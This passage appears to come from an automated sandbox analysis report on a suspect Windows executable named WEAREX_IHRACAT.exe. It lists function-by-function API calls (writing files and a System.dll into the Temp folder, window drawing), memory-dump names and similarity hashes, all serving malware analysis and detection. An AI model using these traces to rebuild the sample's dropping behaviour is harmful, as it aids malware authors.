                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                          • String ID: AB@$Call$N$open
                          • API String ID: 3615053054-1375180041
                          • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                          • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                          • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                          • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                          Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C16
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
                          • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                            • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                            • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                          • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                          • wsprintfA.USER32 ref: 00405C7E
                          • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                          • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                          • CloseHandle.KERNEL32(00000000), ref: 00405D76
                            • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00405B58
                            • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                          • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                          • API String ID: 1265525490-3322868524
                          • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                          • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                          • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                          • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32(?,?), ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F
                          • API String ID: 941294808-1304234792
                          • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                          • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                          • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                          • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                          Function 0040617C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061DF
                          • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                          • CharNextW.USER32(?,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061F3
                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00406206
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-341263832
                          • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                          • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                          • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                          • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                          Function 004024EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                          Download Yara Rule
                          APIs
                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll,00000400,?,?,00000021), ref: 0040252D
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll,00000400,?,?,00000021), ref: 00402534
                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402566
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritelstrlen
                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nseB6DC.tmp$C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll
                          • API String ID: 1453599865-487296252
                          • Opcode ID: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
                          • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                          • Opcode Fuzzy Hash: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
                          • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                          Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                          • GetSysColor.USER32(00000000), ref: 004041CD
                          • SetTextColor.GDI32(?,00000000), ref: 004041D9
                          • SetBkMode.GDI32(?,?), ref: 004041E5
                          • GetSysColor.USER32(?), ref: 004041F8
                          • SetBkColor.GDI32(?,?), ref: 00404208
                          • DeleteObject.GDI32(?), ref: 00404222
                          • CreateBrushIndirect.GDI32(?), ref: 0040422C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                          • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                          • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                          Function 1000248D Relevance: 10.6, APIs: 7, Instructions: 110COMMON
                          Download Yara Rule
                          APIs
                          • wsprintfW.USER32 ref: 100024E1
                          • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                            • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,752BFFC0,100011AA,?,00000000), ref: 1000131E
                          • GlobalFree.KERNEL32(?), ref: 10002562
                          • GlobalFree.KERNEL32(00000000), ref: 1000258B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FreeGlobal$FromStringlstrcpywsprintf
                          • String ID:
                          • API String ID: 2435812281-0
                          • Opcode ID: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
                          • Instruction ID: c19482fd6b93636a14d77dfdabfb39ecfcb824cf15b2f076733b0032149e6b96
                          • Opcode Fuzzy Hash: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
                          • Instruction Fuzzy Hash: B13104B1405A06EFF621DFA4CC9492BBBBCFB403D6722491AF6419216DCB319C50DF64
                          Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                          • GlobalFree.KERNEL32(00000000), ref: 00402875
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                          • String ID:
                          • API String ID: 3294113728-0
                          • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                          • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                          • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                          • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                          Function 00405192 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                          • lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                          • lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                          • SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID:
                          • API String ID: 2531174081-0
                          • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                          • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                          • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                          • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8
                          Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
                          • GetTickCount.KERNEL32 ref: 00402D51
                          • wsprintfW.USER32 ref: 00402D7F
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                            • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                            • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                            • Part of subcall function 00402CFC: MulDiv.KERNEL32(00000000,00000064,0000521D), ref: 00402D11
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                          • String ID: ... %d%%
                          • API String ID: 722711167-2449383134
                          • Opcode ID: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
                          • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                          • Opcode Fuzzy Hash: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
                          • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                          Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                          • GetMessagePos.USER32 ref: 00404A7F
                          • ScreenToClient.USER32(?,?), ref: 00404A99
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                          • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                          • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                          Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                          Download Yara Rule
                          APIs
